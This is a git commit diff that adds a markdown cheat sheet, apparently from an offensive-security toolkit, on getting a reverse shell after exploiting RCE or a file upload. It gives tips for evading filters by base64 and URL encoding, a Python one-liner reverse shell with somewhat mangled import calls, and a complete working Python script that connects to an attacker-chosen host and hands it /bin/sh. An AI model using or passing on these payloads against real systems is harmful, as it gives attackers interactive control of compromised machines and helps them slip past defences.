Added new path and resouces

2025-12-28 13:43:15 -08:00 · 2024-12-05 00:14:22 +07:00
parent e7e1f32e80
commit 834e9698f4
5 changed files with 103 additions and 1 deletions
--- a/scripts/Reverse-shell.md
+++ b/scripts/Reverse-shell.md
@@ -0,0 +1,36 @@
+# TIPS 
+
+If you have obtained a vulnerability such as RCE, file upload or something else, you can use the script below to spawn a shell or backconnect revershell. If the shell does not run see below
+
+1. Make sure the target has internet access (internet access opened)
+2. Try changing the port to a larger one such as 8080, 8888, etc. 
+3. Encode your script using base64 and then decode it 3. 
+4. Encode your script using url encode 
+
+## Script 1 
+
+```
+socket=_import("socket");os=import("os");pty=import_("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<YOUR IP>",<PORT LISTENER>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")
+```
+
+## Script 2
+
+```
+import socket
+import subprocess
+import os
+
+def back_connect(host, port):
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((host, port))
+    os.dup2(s.fileno(), 0)  
+    os.dup2(s.fileno(), 1)  
+    os.dup2(s.fileno(), 2)  
+    
+    subprocess.call(["/bin/sh", "-i"])
+
+host = "<YOUR IP>"  
+port = <YOUR LISTENER PORT>           
+
+back_connect(host, port)
+```